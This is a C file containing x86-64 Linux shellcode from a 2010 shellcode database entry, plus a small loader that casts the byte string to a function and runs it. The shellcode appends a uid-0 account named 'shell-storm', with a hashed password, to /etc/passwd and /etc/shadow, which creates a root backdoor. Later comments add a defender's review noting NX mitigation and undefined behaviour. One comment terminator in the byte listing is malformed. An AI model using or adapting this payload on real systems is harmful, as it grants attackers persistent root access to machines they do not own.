  1. /*
  2. Title: Linux/x86-64 - Add root user with password - 390 bytes
  3. Date: 2010-06-20
  4. Tested: Archlinux x86_64 k2.6.33
  5.  
  6. Author: Jonathan Salwan
  7. Web: http://shell-storm.org | http://twitter.com/jonathansalwan
  8.  
  9. ! Database of shellcodes http://www.shell-storm.org/shellcode/
  10.  
  11.  
  12.  
  13. Add root user with password:
  14. - User: shell-storm
  15. - Pass: leet
  16. - id : 0
  17. */
  18.  
  19. #include <stdio.h>
  20.  
  21.  
  22. char *SC =
  23. /* open("/etc/passwd", O_WRONLY|O_CREAT|O_APPEND, 01204) */
  24.  
  25. "\x48\xbb\xff\xff\xff\xff\xff\x73\x77\x64" /* mov $0x647773ffffffffff,%rbx */
  26. "\x48\xc1\xeb\x28" /* shr $0x28,%rbx */
  27. "\x53" /* push %rbx */
  28. "\x48\xbb\x2f\x65\x74\x63\x2f\x70\x61\x73" /* mov $0x7361702f6374652f,%rbx */
  29. "\x53" /* push %rbx */
  30. "\x48\x89\xe7" /* mov %rsp,%rdi */
  31. "\x66\xbe\x41\x04" /* mov $0x441,%si */
  32. "\x66\xba\x84\x02" /* mov $0x284,%dx */
  33. "\x48\x31\xc0" /* xor %rax,%rax */
  34. "\xb0\x02" /* mov $0x2,%al */
  35. "\x0f\x05" /* syscall */
  36.  
  37. /* write(3, "shell-storm:x:0:0:shell-storm.or"..., 46) */
  38.  
  39. "\x48\xbf\xff\xff\xff\xff\xff\xff\xff\x03" /* mov $0x3ffffffffffffff,%rdi */
  40. "\x48\xc1\xef\x38" /* shr $0x38,%rdi */
  41. "\x48\xbb\xff\xff\x2f\x62\x61\x73\x68\x0a" /* mov $0xa687361622fffff,%rbx */
  42. "\x48\xc1\xeb\x10" /* shr $0x10,%rbx */
  43. "\x53" /* push %rbx */
  44. "\x48\xbb\x67\x3a\x2f\x3a\x2f\x62\x69\x6e" /* mov $0x6e69622f3a2f3a67,%rbx */
  45. "\x53" /* push %rbx */
  46. "\x48\xbb\x73\x74\x6f\x72\x6d\x2e\x6f\x72" /* mov $0x726f2e6d726f7473,%rbx */
  47. "\x53" /* push %rbx */
  48. "\x48\xbb\x30\x3a\x73\x68\x65\x6c\x6c\x2d" /* mov $0x2d6c6c6568733a30,%rbx */
  49. "\x53" /* push %rbx */
  50. "\x48\xbb\x6f\x72\x6d\x3a\x78\x3a\x30\x3a" /* mov $0x3a303a783a6d726f,%rbx */
  51. "\x53" /* push %rbx */
  52. "\x48\xbb\x73\x68\x65\x6c\x6c\x2d\x73\x74" /* mov $0x74732d6c6c656873,%rbx */
  53. "\x53" /* push %rbx */
  54. "\x48\x89\xe6" /* mov %rsp,%rsi */
  55. "\x48\xba\xff\xff\xff\xff\xff\xff\xff\x2e" /* mov $0x2effffffffffffff,%rdx */
  56. "\x48\xc1\xea\x38" /* shr $0x38,%rdx */
  57. "\x48\x31\xc0" /* xor %rax,%rax */
  58. "\xb0\x01" /* mov $0x1,%al */
  59. "\x0f\x05" /* syscall */
  60.  
  61. /* close(3) */
  62.  
  63. "\x48\xbf\xff\xff\xff\xff\xff\xff\xff\x03" /* mov $0x3ffffffffffffff,%rdi */
  64. "\x48\xc1\xef\x38" /* shr $0x38,%rdi */
  65. "\x48\x31\xc0" /* xor %rax,%rax */
  66. "\xb0\x03" /* mov $0x3,%al */
  67. "\x0f\x05" /* syscall */
  68.  
  69. /* Xor */
  70.  
  71. "\x48\x31\xdb" /* xor %rbx,%rbx */
  72. "\x48\x31\xff" /* xor %rdi,%rdi */
  73. "\x48\x31\xf6" /* xor %rsi,%rsi */
  74. "\x48\x31\xd2" /* xor %rdx,%rdx */
  75.  
  76. /* open("/etc/shadow", O_WRONLY|O_CREAT|O_APPEND, 01204) */
  77.  
  78. "\x48\xbb\xff\xff\xff\xff\xff\x64\x6f\x77" /* mov $0x776f64ffffffffff,%rbx */
  79. "\x48\xc1\xeb\x28" /* shr $0x28,%rbx */
  80. "\x53" /* push %rbx */
  81. "\x48\xbb\x2f\x65\x74\x63\x2f\x73\x68\x61" /* mov $0x6168732f6374652f,%rbx */
  82. "\x53" /* push %rbx */
  83. "\x48\x89\xe7" /* mov %rsp,%rdi */
  84. "\x66\xbe\x41\x04" /* mov $0x441,%si */
  85. "\x66\xba\x84\x02" /* mov $0x284,%dx */
  86. "\x48\x31\xc0" /* xor %rax,%rax */
  87. "\xb0\x02" /* mov $0x2,%al */
  88. "\x0f\x05" /* syscall *
  89.  
  90. /* write(3, "shell-storm:$1$reWE7GM1$axeMg6LT"..., 59) */
  91.  
  92. "\x48\xbf\xff\xff\xff\xff\xff\xff\xff\x03" /* mov $0x3ffffffffffffff,%rdi */
  93. "\x48\xc1\xef\x38" /* shr $0x38,%rdi */
  94. "\x48\xbb\xff\xff\xff\xff\xff\x3a\x3a\x0a" /* mov $0xa3a3affffffffff,%rbx */
  95. "\x48\xc1\xeb\x28" /* shr $0x28,%rbx */
  96. "\x53" /* push %rbx */
  97. "\x48\xbb\x34\x37\x37\x38\x3a\x3a\x3a\x3a" /* mov $0x3a3a3a3a38373734,%rbx */
  98. "\x53" /* push %rbx */
  99. "\x48\xbb\x5a\x30\x55\x33\x4d\x2f\x3a\x31" /* mov $0x313a2f4d3355305a,%rbx */
  100. "\x53" /* push %rbx */
  101. "\x48\xbb\x73\x2f\x50\x64\x53\x67\x63\x46" /* mov $0x4663675364502f73,%rbx */
  102. "\x53" /* push %rbx */
  103. "\x48\xbb\x61\x78\x65\x4d\x67\x36\x4c\x54" /* mov $0x544c36674d657861,%rbx */
  104. "\x53" /* push %rbx */
  105. "\x48\xbb\x65\x57\x45\x37\x47\x4d\x31\x24" /* mov $0x24314d4737455765,%rbx */
  106. "\x53" /* push %rbx */
  107. "\x48\xbb\x6f\x72\x6d\x3a\x24\x31\x24\x72" /* mov $0x722431243a6d726f,%rbx */
  108. "\x53" /* push %rbx */
  109. "\x48\xbb\x73\x68\x65\x6c\x6c\x2d\x73\x74" /* mov $0x74732d6c6c656873,%rbx */
  110. "\x53" /* push %rbx */
  111. "\x48\x89\xe6" /* mov %rsp,%rsi */
  112. "\x48\xba\xff\xff\xff\xff\xff\xff\xff\x3b" /* mov $0x3bffffffffffffff,%rdx */
  113. "\x48\xc1\xea\x38" /* shr $0x38,%rdx */
  114. "\x48\x31\xc0" /* xor %rax,%rax */
  115. "\xb0\x01" /* mov $0x1,%al */
  116. "\x0f\x05" /* syscall */
  117.  
  118. /* close(3) */
  119.  
  120. "\x48\xbf\xff\xff\xff\xff\xff\xff\xff\x03" /* mov $0x3ffffffffffffff,%rdi */
  121. "\x48\xc1\xef\x38" /* shr $0x38,%rdi */
  122. "\x48\x31\xc0" /* xor %rax,%rax */
  123. "\xb0\x03" /* mov $0x3,%al */
  124. "\x0f\x05" /* syscall */
  125.  
  126. /* _exit(0) */
  127.  
  128. "\x48\x31\xff" /* xor %rdi,%rdi */
  129. "\x48\x31\xc0" /* xor %rax,%rax */
  130. "\xb0\x3c" /* mov $0x3c,%al */
  131. "\x0f\x05"; /* syscall */
  132.  
  133.  
/*
 * Entry point of the loader: prints the byte length of SC and then
 * transfers control into the SC byte string itself.
 *
 * Review notes (defender's view):
 * - strlen() is called but no header included in this file declares it
 *   (only <stdio.h> is included above), so the call relies on an implicit
 *   declaration; "%d" paired with a size_t argument is also a
 *   format/argument mismatch, which is undefined behaviour in C.
 * - The indirect call below jumps into a data object (a string literal).
 *   On a build where that literal lives in a non-executable segment the
 *   call faults immediately; NX / W^X enforcement is the relevant
 *   mitigation, and a data-pointer-to-function-pointer cast followed by a
 *   call is the pattern to look for when auditing code like this.
 * - Per the "_exit(0)" comment on the last group of bytes, control is not
 *   expected to come back from the call, so "return 0" is presumably only
 *   reached if the payload does not run — confirm against the bytes.
 */
int main(void)
{
fprintf(stdout,"Length: %d\n",strlen(SC)); /* strlen stops at the first 0x00 byte; the string above appears to contain no NUL bytes, so this should equal its full length — verify */
(*(void(*)()) SC)(); /* cast char* to void(*)() and call it: executes the bytes of SC as machine code */
return 0;
}